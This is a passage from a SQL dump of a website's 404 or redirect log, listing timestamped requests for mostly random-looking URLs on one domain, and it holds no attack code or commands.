00:00:00'),(3672,'http://www.hallcrestheights.org/tkuykfj-dnjjb-ucyupa-jaylrl-i20162630-wfvdy-ruqp-k56073-klsdef-hxdfpd-fufpfaj-npvza-ttuxd/',NULL,'','',1,0,'2017-01-09 06:53:14','0000-00-00 00:00:00'),(3673,'http://www.hallcrestheights.org/k17640-jgletkym-drqzn-rvmlkswa-zvkecqq-i20162628-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-09 06:55:11','0000-00-00 00:00:00'),(3674,'http://www.hallcrestheights.org/lugdltrs-mxxhy-pzqjllzo-hnjumnt-k52020-ecwf-ogywb-iwyrur-i20162631-fgvf.htm',NULL,'','',1,0,'2017-01-09 06:57:07','0000-00-00 00:00:00'),(3675,'http://www.hallcrestheights.org/i20162632-k16920-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-09 06:59:02','0000-00-00 00:00:00'),(3676,'http://www.hallcrestheights.org/i20162632-ixnmueah-whioz-hjxbnwpg-eyooayi-k14220-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-09 07:00:58','0000-00-00 00:00:00'),(3677,'http://www.hallcrestheights.org/i20162632-ixnmueah-whioz-hjxbnwpg-eyooayi-k37620-kuks-szqce-baqdom-ytni.htm',NULL,'','',1,0,'2017-01-09 07:02:55','0000-00-00 00:00:00'),(3678,'http://www.hallcrestheights.org/k26280-lugdltrs-mxxhy-pzqjllzo-hnjumnt-i20162636-ecwf-ogywb-iwyrur-fgvf.htm',NULL,'','',1,0,'2017-01-09 07:04:51','0000-00-00 00:00:00'),(3679,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-k59940-iwnz-i20162637-korpv-ubfgnq-tpmh.htm',NULL,'','',1,0,'2017-01-09 07:06:46','0000-00-00 00:00:00'),(3680,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-umzb-i20162634-saiimjz-fozgdvdd-qjvdobkn-k31857-lykcone-dwjmaxev-ortbz/',NULL,'','',1,0,'2017-01-09 07:08:43','0000-00-00 00:00:00'),(3681,'http://www.hallcrestheights.org/k46080-pcscqruf-unpkw-xpoideot-wtvsoar-i20162636-mosm-gepla-lheliy-rqiy.htm',NULL,'','',1,0,'2017-01-09 07:10:40','0000-00-00 00:00:00'),(3682,'http://www.hallcrestheights.org/i20162632-jgletkym-drqzn-rvmlkswa-zvkecqq-k57420-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-09 07:12:35','0000-00-00 00:00:00'),(3683,'http://www.hallcrestheights.org/soegszx-yifet-vtndyu-uhvfcy-i20162630-zlsxx-qrox-k36273-aehksk-xyxemb-uqudtwq-ceyvu-ciwqw/',NULL,'','',1,0,'2017-01-09 07:14:31','0000-00-00 00:00:00'),(3684,'http://www.hallcrestheights.org/k49320-ixnmueah-whioz-hjxbnwpg-eyooayi-kuks-szqce-baqdom-i20162631-ytni.htm',NULL,'','',1,0,'2017-01-09 07:16:27','0000-00-00 00:00:00'),(3685,'http://www.hallcrestheights.org/k46800-fadlajfn-lgfpc-i20162634-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr.htm',NULL,'','',1,0,'2017-01-09 07:18:23','0000-00-00 00:00:00'),(3686,'http://www.hallcrestheights.org/i20162637-upttm-k784-nbea-tgrb-nqcdcncx-rdhcpgzz-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-09 07:20:18','0000-00-00 00:00:00'),(3687,'http://www.hallcrestheights.org/ryvh-rhmqtyy-sllge-ajanpd-k12132-mefnxhq-fhjdyhao-i20162630-xrcjhwu-vdsvezyt.htm',NULL,'','',1,0,'2017-01-09 07:22:15','0000-00-00 00:00:00'),(3688,'http://www.hallcrestheights.org/zmku-edtzjiv-yoqxi-fgxuhx-k33732-ptvuhmi-wnzkorpv-i20162630-ubfgnqt-pmhprbik.htm',NULL,'','',1,0,'2017-01-09 07:24:11','0000-00-00 00:00:00'),(3689,'http://www.hallcrestheights.org/k32832-lugd-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-i20162630-iwyrurf-gvfcwqzh.htm',NULL,'','',1,0,'2017-01-09 07:26:07','0000-00-00 00:00:00'),(3690,'http://www.hallcrestheights.org/jgle-tkymdrq-znrvm-lkswaz-i20162628-k59292-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo.htm',NULL,'','',1,0,'2017-01-09 07:28:05','0000-00-00 00:00:00'),(3691,'http://www.hallcrestheights.org/k41112-mrcq-gbeifuw-i20162634-grabt-nwyrqs-emgwkow-hmemxgku-cybnpzk-icvejxku.htm',NULL,'','',1,0,'2017-01-09 07:29:59','0000-00-00 00:00:00'),(3692,'http://www.hallcrestheights.org/qlbowci-ggece-ayafxr-glnikg-i20162630-hhmbb-xpge-smrcai-ztbiau-k55173-wdtvixp-mtzhz-zwzrq/',NULL,'','',1,0,'2017-01-09 07:31:56','0000-00-00 00:00:00'),(3693,'http://www.hallcrestheights.org/i20162637-pcscq-k21484-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-09 07:33:51','0000-00-00 00:00:00'),(3694,'http://www.hallcrestheights.org/lugdl-k32104-trsm-xxhy-pzqjllzo-hnjumnte-cwfogy-wbiwy-rurfgv-i20162636-fcwqz.htm',NULL,'','',1,0,'2017-01-09 07:35:47','0000-00-00 00:00:00'),(3695,'http://www.hallcrestheights.org/dvisc-k41284-iwbv-wkux-krbzomsm-vuclzuph-vqawuo-xzmnp-zvsgcr-i20162636-lycmc.htm',NULL,'','',1,0,'2017-01-09 07:37:43','0000-00-00 00:00:00'),(3696,'http://www.hallcrestheights.org/k58392-dvis-ciwbvwk-uxkrb-zomsmv-i20162628-uclzuph-vqawuoxz-mnpzvsg-crlycmcz.htm',NULL,'','',1,0,'2017-01-09 07:39:38','0000-00-00 00:00:00'),(3697,'http://www.hallcrestheights.org/edzv-dlqcomn-i20162634-nmmca-wvbfuj-k20412-apyvrlf-lxhqjkuh-kcmumbh-mgznkohe.htm',NULL,'','',1,0,'2017-01-09 07:41:35','0000-00-00 00:00:00'),(3698,'http://www.hallcrestheights.org/k36792-edzv-dlqcomn-nmmca-wvbfuj-i20162628-apyvrlf-lxhqjkuh-kcmumbh-mgznkohe.htm',NULL,'','',1,0,'2017-01-09 07:43:33','0000-00-00 00:00:00'),(3699,'http://www.hallcrestheights.org/fadla-k61984-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh-i20162636-rmxag.htm',NULL,'','',1,0,'2017-01-09 07:45:27','0000-00-00 00:00:00'),(3700,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-i20162629-uhvfc-yzls-k4449-xxqroxa-ehkskxy-xembu-qudtwq-ceyv-uciwqwsg/',NULL,'','',1,0,'2017-01-09 07:47:23','0000-00-00 00:00:00'),(3701,'http://www.hallcrestheights.org/k42912-jgle-tkymdrq-i20162634-znrvm-lkswaz-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo.htm',NULL,'','',1,0,'2017-01-09 07:49:18','0000-00-00 00:00:00'),(3702,'http://www.hallcrestheights.org/mrcq-gbeifuw-grabt-nwyrqs-i20162628-k57492-emgwkow-hmemxgku-cybnpzk-icvejxku.htm',NULL,'','',1,0,'2017-01-09 07:51:14','0000-00-00 00:00:00'),(3703,'http://www.hallcrestheights.org/pcscq-k37864-rufu-npkw-xpoideot-wtvsoarm-i20162633-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-09 07:53:10','0000-00-00 00:00:00'),(3704,'http://www.hallcrestheights.org/jglet-k42184-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl-qfcneb-i20162636-xilnv.htm',NULL,'','',1,0,'2017-01-09 07:55:07','0000-00-00 00:00:00'),(3705,'http://www.hallcrestheights.org/dvis-ciwbvwk-i20162634-uxkrb-zomsmv-k42012-uclzuph-vqawuoxz-mnpzvsg-crlycmcz.htm',NULL,'','',1,0,'2017-01-09 07:57:02','0000-00-00 00:00:00'),(3706,'http://www.hallcrestheights.org/k54432-vqjn-yspvhol-jpeur-rtpilu-ourxivl-btrhnnmt-i20162630-qzkowts-xppbgrrc.htm',NULL,'','',1,0,'2017-01-09 07:58:59','0000-00-00 00:00:00'),(3707,'http://www.hallcrestheights.org/edzvd-k59464-lqco-mnnm-mcawvbfu-i20162632-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh.htm',NULL,'','',1,0,'2017-01-09 08:02:51','0000-00-00 00:00:00'),(3708,'http://www.hallcrestheights.org/cwhr-iwgpekz-qdwkvum-i20162629-zbsai-imjzf-ozgdvdd-k58845-qjvd-obknlykc-onedw-jmaxev-ortbz/',NULL,'','',1,0,'2017-01-09 08:04:47','0000-00-00 00:00:00'),(3709,'http://www.hallcrestheights.org/yembj-k35227-vhtqqd-ckzfl-tzte/rqbwnsw-nsnjplpf-trrjncyp-i20162635-joqwgzj-evihsdpa/',NULL,'','',1,0,'2017-01-09 08:05:56','0000-00-00 00:00:00'),(3710,'http://www.hallcrestheights.org/ryvhr-k11404-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc-jhwuvd-i20162636-svezy.htm',NULL,'','',1,0,'2017-01-09 08:06:43','0000-00-00 00:00:00'),(3711,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx-bnwpge-k53532-yooayik-uksszqce-i20162630-baqdomy-tniholbd.htm',NULL,'','',1,0,'2017-01-09 08:08:39','0000-00-00 00:00:00'),(3712,'http://www.hallcrestheights.org/gnfzn-k36964-xvjx-palt-itjshkyj-yldpijaa-i20162633-mdurta-enpgg-wtdvlx-tdqku.htm',NULL,'','',1,0,'2017-01-09 08:10:36','0000-00-00 00:00:00'),(3713,'http://www.hallcrestheights.org/gnfz-nxvjxpa-ltitj-shkyjy-i20162628-k37692-ldpijaa-mdurtaen-pggwtdv-lxtdqkun.htm',NULL,'','',1,0,'2017-01-09 08:12:31','0000-00-00 00:00:00'),(3714,'http://www.hallcrestheights.org/ixnmu-k52804-eahw-hioz-hjxbnwpg-eyooayik-uksszq-cebaq-domytn-i20162636-iholb.htm',NULL,'','',1,0,'2017-01-09 08:14:28','0000-00-00 00:00:00'),(3715,'http://www.hallcrestheights.org/ixnm-ueahwhi-ozhjx-bnwpge-i20162628-k16092-yooayik-uksszqce-baqdomy-tniholbd.htm',NULL,'','',1,0,'2017-01-09 08:16:23','0000-00-00 00:00:00'),(3716,'http://www.hallcrestheights.org/jglet-k58564-kymd-rqzn-rvmlkswa-i20162632-zvkecqqn-eeiaqj-zlnpl-qfcneb-xilnv.htm',NULL,'','',1,0,'2017-01-09 08:18:19','0000-00-00 00:00:00'),(3717,'http://www.hallcrestheights.org/pcscq-k21484-rufu-npkw-xpoideot-i20162632-wtvsoarm-osmgep-lalhe-liyrqi-yqfuf.htm',NULL,'','',1,0,'2017-01-09 08:22:12','0000-00-00 00:00:00'),(3718,'http://www.hallcrestheights.org/i20162628-mrcqgb-k2476-eifuwg-rabtnw-yrqs-emgwko-whmemx-gkucy-bnpzkic-vejxkul.htm',NULL,'','',1,0,'2017-01-09 08:24:07','0000-00-00 00:00:00'),(3719,'http://www.hallcrestheights.org/i20162628-ryvhrh-k1576-mqtyys-llgeaj-anpd-mefnxh-qfhjdy-haoxr-cjhwuvd-svezytw.htm',NULL,'','',2,0,'2017-01-09 08:27:59','0000-00-00 00:00:00'),(3720,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-kvum-zbsai-imjz-fozgdvd-i20162632-dqjvdob-k39189-knlyk-conedw-jmax-evortbzq/',NULL,'','',1,0,'2017-01-09 08:29:55','0000-00-00 00:00:00'),(3721,'http://www.hallcrestheights.org/dvisci-k40816-wbvwku-xkrbzo-msmv-uclzup-hvqawu-i20162634-oxzmn-pzvsgcr-lycmczo.htm',NULL,'','',1,0,'2017-01-09 08:31:50','0000-00-00 00:00:00'),(3722,'http://www.hallcrestheights.org/i20162637-zmkued-k23176-tzjivy-oqxifg-xuhx-ptvuhm-iwnzko-rpvub-fgnqtpm-hprbikz.htm',NULL,'','',1,0,'2017-01-09 08:33:47','0000-00-00 00:00:00'),(3723,'http://www.hallcrestheights.org/i20162637-vqjnys-k43876-pvholj-peurrt-pilu-ourxiv-lbtrhn-nmtqz-kowtsxp-pbgrrcd.htm',NULL,'','',1,0,'2017-01-09 08:35:42','0000-00-00 00:00:00'),(3724,'http://www.hallcrestheights.org/cwhriw-gpekzqdw-i20162628-kvum-zbsai-imjz-fozgdvd-k48549-dqjvdob-knlyk-conedw-jmax-evortbzq/',NULL,'','',1,0,'2017-01-09 08:37:39','0000-00-00 00:00:00'),(3725,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-qxdos-fiet-k59889-yuaixnr-i20162632-bdggsaa-rhefs-kjydmr-ujwi-mjqiaaur/',NULL,'','',1,0,'2017-01-09 08:39:35','0000-00-00 00:00:00'),(3726,'http://www.hallcrestheights.org/ryvhrh-k62416-mqtyys-llgeaj-anpd-mefnxh-qfhjdy-i20162634-haoxr-cjhwuvd-svezytw.htm',NULL,'','',1,0,'2017-01-09 08:41:32','0000-00-00 00:00:00'),(3727,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-i20162628-yupa-jaylr-lwfv-dyruqpk-lsdefhx-dfpdf-k47649-ufpfaj-npvz-attuxdwv/',NULL,'','',1,0,'2017-01-09 08:43:28','0000-00-00 00:00:00'),(3728,'http://www.hallcrestheights.org/gnfznx-k20116-vjxpal-titjsh-kyjy-ldpija-amdurt-aenpg-i20162635-gwtdvlx-tdqkunf.htm',NULL,'','',1,0,'2017-01-09 08:45:23','0000-00-00 00:00:00'),(3729,'http://www.hallcrestheights.org/fadlaj-k61516-fnlgfp-cvwgmy-hdec-wxbdeu-dkovfi-i20162634-ibptq-uhzxchh-rmxagfp.htm',NULL,'','',1,0,'2017-01-09 08:47:19','0000-00-00 00:00:00'),(3730,'http://www.hallcrestheights.org/dvisciwb-k4780-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-mnpzvs-gcrl-i20162636-ycmczoqq.htm',NULL,'','',1,0,'2017-01-09 08:55:20','0000-00-00 00:00:00'),(3731,'http://www.hallcrestheights.org/index.php?option=com_easyblog&view=dashboard&layout=write',NULL,'http://www.hallcrestheights.org/','',25,0,'2017-01-09 08:57:09','0000-00-00 00:00:00'),(3732,'http://www.hallcrestheights.org/k17589-ajqxxu-cuzaofif-ephi-ijimj-njbo-gtsakbc-cgyfmdv-i20162633-juxzl-ektsls-hxos-qqjvfyoi/',NULL,'','',1,0,'2017-01-09 09:01:54','0000-00-00 00:00:00'),(3733,'http://www.hallcrestheights.org/fadlajfn-k25480-lgfpc-vwgmyhde-cwxbdeu-dkov-fiibp-tquhzx-chhr-i20162636-mxagfpap.htm',NULL,'','',1,0,'2017-01-09 09:08:25','0000-00-00 00:00:00'),(3734,'http://www.hallcrestheights.org/htxwhykr-svsv-hudykbq-xdosfiet-yuaixnrb-dggs-aarh-i20162633-efskj-ydmr-ujwimjq-k7941-iaauri/',NULL,'','',1,0,'2017-01-09 09:19:20','0000-00-00 00:00:00'),(3735,'http://www.hallcrestheights.org/gnfznxvj-k56620-xpalt-itjshkyj-yldpija-i20162632-amdu-rtaen-pggwtd-vlxt-dqkunfgl.htm',NULL,'','',1,0,'2017-01-09 09:21:31','0000-00-00 00:00:00'),(3736,'http://www.hallcrestheights.org/pcscqruf-k57520-unpkw-xpoideot-wtvsoar-i20162632-mosm-gepla-lheliy-rqiy-qfufxvug.htm',NULL,'','',1,0,'2017-01-09 09:23:42','0000-00-00 00:00:00'),(3737,'http://www.hallcrestheights.org/soegsz-xyifetvt-ndyu-uhvfc-yzls-xxqroxa-ehkskxy-i20162633-xembu-qudtwq-k18489-ceyv-uciwqwsg/',NULL,'','',1,0,'2017-01-09 09:25:54','0000-00-00 00:00:00'),(3738,'http://www.hallcrestheights.org/lugdltrs-k37720-mxxhy-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb-iwyrur-fgvf-cwqzhrib.htm',NULL,'','',1,0,'2017-01-09 09:34:39','0000-00-00 00:00:00'),(3739,'http://www.hallcrestheights.org/images/logo_img.php',NULL,'','',5,0,'2017-01-09 09:35:20','0000-00-00 00:00:00'),(3740,'http://www.hallcrestheights.org/upttmnbe-k46180-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb-i20162636-wivsmqkr.htm',NULL,'','',1,0,'2017-01-09 09:36:48','0000-00-00 00:00:00'),(3741,'http://www.hallcrestheights.org/dvisciwb-k46900-vwkux-krbzomsm-vuclzup-hvqa-wuoxz-i20162634-mnpzvs-gcrl-ycmczoqq.htm',NULL,'','',1,0,'2017-01-09 09:39:04','0000-00-00 00:00:00'),(3742,'http://www.hallcrestheights.org/fadlajfn-k16120-lgfpc-vwgmyhde-cwxbdeu-i20162632-dkov-fiibp-tquhzx-chhr-mxagfpap.htm',NULL,'','',1,0,'2017-01-09 09:45:32','0000-00-00 00:00:00'),(3743,'http://www.hallcrestheights.org/lugdltrs-k14320-mxxhy-pzqjllzo-hnjumnt-i20162632-ecwf-ogywb-iwyrur-fgvf-cwqzhrib.htm',NULL,'','',1,0,'2017-01-09 09:52:05','0000-00-00 00:00:00'),(3744,'http://www.hallcrestheights.org/fadlajfn-k51220-lgfpc-vwgmyhde-i20162631-cwxbdeu-dkov-fiibp-tquhzx-chhr-mxagfpap.htm',NULL,'','',1,0,'2017-01-09 09:54:16','0000-00-00 00:00:00'),(3745,'http://www.hallcrestheights.org/tkuykf-jdnjjbuc-yupa-jaylr-lwfv-dyruqpk-i20162632-lsdefhx-dfpdf-ufpfaj-k38289-npvz-attuxdwv/',NULL,'','',1,0,'2017-01-09 09:56:27','0000-00-00 00:00:00'),(3746,'http://www.hallcrestheights.org/ixnmueah-k35020-whioz-hjxbnwpg-eyooayi-i20162632-kuks-szqce-baqdom-ytni-holbdent.htm',NULL,'','',1,0,'2017-01-09 10:00:50','0000-00-00 00:00:00'),(3747,'http://www.hallcrestheights.org/lugdltrs-k49420-mxxhy-pzqjllzo-i20162631-hnjumnt-ecwf-ogywb-iwyrur-fgvf-cwqzhrib.htm',NULL,'','',1,0,'2017-01-09 10:03:00','0000-00-00 00:00:00'),(3748,'http://www.hallcrestheights.org/oiyizgol-rcmw-fbsnopd-gfnhskrl-k56181-jrgfctfz-fiwx-wmak-oayos-i20162634-mpql-gvegdfv-gcrcbz/',NULL,'','',1,0,'2017-01-09 10:05:11','0000-00-00 00:00:00'),(3749,'http://www.hallcrestheights.org/i20162628-lugd-k16192-ltrsmxx-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-ribn.htm',NULL,'','',1,0,'2017-01-09 10:07:22','0000-00-00 00:00:00'),(3750,'http://www.hallcrestheights.org/pcsc-k43012-qrufunp-kwxpo-ideotw-tvsoarm-osmgepla-i20162634-lheliyr-qiyqfufx-vugo.htm',NULL,'','',1,0,'2017-01-09 10:09:34','0000-00-00 00:00:00'),(3751,'http://www.hallcrestheights.org/edzv-k41212-dlqcomn-nmmca-wvbfuj-apyvrlf-lxhqjkuh-i20162634-kcmumbh-mgznkohe-yrup.htm',NULL,'','',1,0,'2017-01-09 10:11:44','0000-00-00 00:00:00'),(3752,'http://www.hallcrestheights.org/lugd-k53632-ltrsmxx-i20162630-hypzq-jllzoh-njumnte-cwfogywb-iwyrurf-gvfcwqzh-ribn.htm',NULL,'','',1,0,'2017-01-09 10:16:06','0000-00-00 00:00:00'),(3753,'http://www.hallcrestheights.org/bsoapaza-psta-sgmhcqc-mckfrdtf-kgpvbchs-i20162631-iwho-rklv-zrtjr-k62301-syoa-ayfwgdx-skmyuk/',NULL,'','',1,0,'2017-01-09 10:18:18','0000-00-00 00:00:00'),(3754,'http://www.hallcrestheights.org/dvis-k62812-ciwbvwk-uxkrb-zomsmv-uclzuph-i20162633-vqawuoxz-mnpzvsg-crlycmcz-oqqe.htm',NULL,'','',1,0,'2017-01-09 10:20:28','0000-00-00 00:00:00'),(3755,'http://www.hallcrestheights.org/i20162628-ixnm-k36892-ueahwhi-ozhjx-bnwpge-yooayik-uksszqce-baqdomy-tniholbd-enta.htm',NULL,'','',1,0,'2017-01-09 10:22:40','0000-00-00 00:00:00'),(3756,'http://www.hallcrestheights.org/i20162628-vqjn-k37792-yspvhol-jpeur-rtpilu-ourxivl-btrhnnmt-qzkowts-xppbgrrc-dsik.htm',NULL,'','',1,0,'2017-01-09 10:24:50','0000-00-00 00:00:00'),(3757,'http://www.hallcrestheights.org/xhajvqlw-czbi-qsosqxo-qkgqaqyd-cptznzvt-jqoe-vpca-i20162633-qwjal-k28641-uwty-bckbsxb-nbgnnd/',NULL,'','',1,0,'2017-01-09 10:27:02','0000-00-00 00:00:00'),(3758,'http://www.hallcrestheights.org/i20162628-gnfz-k58492-nxvjxpa-ltitj-shkyjy-ldpijaa-mdurtaen-pggwtdv-lxtdqkun-fglq.htm',NULL,'','',2,0,'2017-01-09 10:29:12','0000-00-00 00:00:00'),(3759,'http://www.hallcrestheights.org/ixnm-k20512-ueahwhi-ozhjx-bnwpge-yooayik-uksszqce-i20162634-baqdomy-tniholbd-enta.htm',NULL,'','',1,0,'2017-01-09 10:31:23','0000-00-00 00:00:00'),(3760,'http://www.hallcrestheights.org/i20162628-edzv-k57592-dlqcomn-nmmca-wvbfuj-apyvrlf-lxhqjkuh-kcmumbh-mgznkohe-yrup.htm',NULL,'','',1,0,'2017-01-09 10:33:34','0000-00-00 00:00:00'),(3761,'http://www.hallcrestheights.org/kzpffmsx-klrd-edhwgef-vbbgzagp-i20162630-eciyyuwu-k48801-vfzt-jigj-inamz-bcng-tfmlyrg-hdfipw/',NULL,'','',1,0,'2017-01-09 10:35:48','0000-00-00 00:00:00'),(3762,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo-k384-hnjumnte-cwfogy-wbiwy-i20162637-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-09 10:37:57','0000-00-00 00:00:00'),(3763,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-i20162633-pzqjllzo-k384-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-09 10:40:07','0000-00-00 00:00:00'),(3764,'http://www.hallcrestheights.org/qlbowcig-gece-ayafxrg-lnikghhm-bbxpgesm-rcai-ztbi-auwdt-i20162634-k34581-vixp-mtzhzzw-zrqrdc/',NULL,'','',1,0,'2017-01-09 10:42:18','0000-00-00 00:00:00'),(3765,'http://www.hallcrestheights.org/bsoapaza-psta-sgmhcqc-mckfrdtf-kgpvbchs-iwho-k55281-rklv-zrtjr-i20162634-syoa-ayfwgdx-skmyuk/',NULL,'','',1,0,'2017-01-09 10:46:41','0000-00-00 00:00:00'),(3766,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-qxifgxuh-k1284-xptvuhmi-wnzkor-pvubf-i20162637-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-09 10:48:52','0000-00-00 00:00:00'),(3767,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-vwgmyhde-k32604-cwxbdeud-kovfii-i20162636-bptqu-hzxchh-rmxag-fpapuhg.htm',NULL,'','',1,0,'2017-01-09 10:51:02','0000-00-00 00:00:00'),(3768,'http://www.hallcrestheights.org/nfrko-k54957-pdobbu-mgolz-esrk-wtzqtqb-svjcwjbx-nmyvsssl-djznaah-i20162634-jbkwxros-holvg-wxkw/',NULL,'','',1,0,'2017-01-09 10:53:14','0000-00-00 00:00:00'),(3769,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-i20162633-pzqjllzo-k16764-hnjumnte-cwfogy-wbiwy-rurfgv-fcwqz-hribnkn.htm',NULL,'','',1,0,'2017-01-09 10:55:25','0000-00-00 00:00:00'),(3770,'http://www.hallcrestheights.org/dvisci-wbvwku-xkrbzo-msmv-uclzup-hvqawu-k2076-oxzmn-pzvsgcr-i20162628-lycmczo-qqelud.htm',NULL,'','',1,0,'2017-01-09 10:57:35','0000-00-00 00:00:00'),(3771,'http://www.hallcrestheights.org/upttm-nbea-tgrb-nqcdcncx-k53304-rdhcpgzz-dllimv-i20162636-yxjlt-feobke-bwivs-mqkrfbm.htm',NULL,'','',1,0,'2017-01-09 10:59:51','0000-00-00 00:00:00'),(3772,'http://www.hallcrestheights.org/oiyiz-golrcm-wfbsn-opdg-fnhskrl-jrgfctfz-fiwxwmak-k12657-oayosmp-qlgvegdf-i20162635-vgcrc-bzmq/',NULL,'','',1,0,'2017-01-09 11:01:57','0000-00-00 00:00:00'),(3773,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil-k21984-uourxivl-btrhnn-mtqzk-i20162637-owtsxp-pbgrr-cdsikib.htm',NULL,'','',1,0,'2017-01-09 11:04:09','0000-00-00 00:00:00'),(3774,'http://www.hallcrestheights.org/kzpff-msxklr-dedhw-gefv-bbgzagp-k33357-eciyyuwu-vfztjigj-inamzbc-i20162634-ngtfmlyr-ghdfi-pwgd/',NULL,'','',1,0,'2017-01-09 11:08:37','0000-00-00 00:00:00'),(3775,'http://www.hallcrestheights.org/dvisc-iwbv-wkux-krbzomsm-k11904-vuclzuph-vqawuo-i20162636-xzmnp-zvsgcr-lycmc-zoqqelu.htm',NULL,'','',1,0,'2017-01-09 11:10:41','0000-00-00 00:00:00'),(3776,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu-k41784-japyvrlf-lxhqjk-i20162636-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-09 11:12:52','0000-00-00 00:00:00'),(3777,'http://www.hallcrestheights.org/soegs-zxyife-tvtnd-k54057-yuuh-vfcyzls-xxqroxae-hkskxyxe-mbuqudt-i20162634-wqceyvuc-iwqws-gfrv/',NULL,'','',1,0,'2017-01-09 11:15:03','0000-00-00 00:00:00'),(3778,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-i20162633-hjxbnwpg-k37464-eyooayik-uksszq-cebaq-domytn-iholb-dentafy.htm',NULL,'','',1,0,'2017-01-09 11:17:14','0000-00-00 00:00:00'),(3779,'http://www.hallcrestheights.org/ajqxx-ucuzao-fifep-hiij-imjnjbo-k53157-gtsakbcc-gyfmdvju-xzlekts-i20162634-lshxosqq-jvfyo-ihtt/',NULL,'','',1,0,'2017-01-09 11:19:25','0000-00-00 00:00:00'),(3780,'http://www.hallcrestheights.org/vqjny-spvh-i20162632-oljp-eurrtpil-k21984-uourxivl-btrhnn-mtqzk-owtsxp-pbgrr-cdsikib.htm',NULL,'','',1,0,'2017-01-09 11:21:39','0000-00-00 00:00:00'),(3781,'http://www.hallcrestheights.org/gnfzn-xvjx-palt-itjshkyj-k42684-yldpijaa-mdurta-i20162636-enpgg-wtdvlx-tdqku-nfglqrh.htm',NULL,'','',1,0,'2017-01-09 11:23:47','0000-00-00 00:00:00'),(3782,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-i20162633-qxifgxuh-k17664-xptvuhmi-wnzkor-pvubf-gnqtpm-hprbi-kzonmtl.htm',NULL,'','',1,0,'2017-01-09 11:28:09','0000-00-00 00:00:00'),(3783,'http://www.hallcrestheights.org/wbwpb-onkydh-xjjik-vfvt-zpxbxkc-wjybtylw-osduieqg-k32457-wsogxhg-i20162634-pisdhtni-rmjhv-zyxo/',NULL,'','',1,0,'2017-01-09 11:30:22','0000-00-00 00:00:00'),(3784,'http://www.hallcrestheights.org/edzvd-lqco-i20162632-mnnm-mcawvbfu-k58164-japyvrlf-lxhqjk-uhkcm-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-09 11:32:31','0000-00-00 00:00:00'),(3785,'http://www.hallcrestheights.org/xhajvql-wczbi-qsosqx-i20162631-oqkgqa-qydcp-k7373-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg-nndorcaj/',NULL,'','',1,0,'2017-01-09 11:34:42','0000-00-00 00:00:00'),(3786,'http://www.hallcrestheights.org/ixnmue-ahwhio-zhjxbn-wpge-yooayi-i20162635-kukssz-k20616-qceba-qdomytn-iholbde-ntafym.htm',NULL,'','',1,0,'2017-01-09 11:36:53','0000-00-00 00:00:00'),(3787,'http://www.hallcrestheights.org/wbwpbon-kydhx-jjikvf-i20162631-vtzpxb-xkcwj-k5573-ybty-lwosdu-ieqgws-ogxhgpi-sdhtn-irmjh-vzyxodbx/',NULL,'','',1,0,'2017-01-09 11:39:06','0000-00-00 00:00:00'),(3788,'http://www.hallcrestheights.org/lugdlt-rsmxxh-ypzqjl-lzoh-njumnt-ecwfog-k44376-ywbiw-i20162637-yrurfgv-fcwqzhr-ibnkny.htm',NULL,'','',1,0,'2017-01-09 11:41:15','0000-00-00 00:00:00'),(3789,'http://www.hallcrestheights.org/edzvdl-qcomnn-mmcawv-bfuj-i20162634-apyvrl-flxhqj-k41316-kuhkc-mumbhmg-znkohey-rupxpu.htm',NULL,'','',1,0,'2017-01-09 11:43:26','0000-00-00 00:00:00'),(3790,'http://www.hallcrestheights.org/mrcqgb-eifuwg-rabtnw-yrqs-i20162634-emgwko-whmemx-k62016-gkucy-bnpzkic-vejxkul-zjcjkn.htm',NULL,'','',1,0,'2017-01-09 11:45:37','0000-00-00 00:00:00'),(3791,'http://www.hallcrestheights.org/ryvhrh-mqtyys-llgeaj-anpd-mefnxh-qfhjdy-k23676-haoxr-i20162637-cjhwuvd-svezytw-lcycws.htm',NULL,'','',1,0,'2017-01-09 11:49:59','0000-00-00 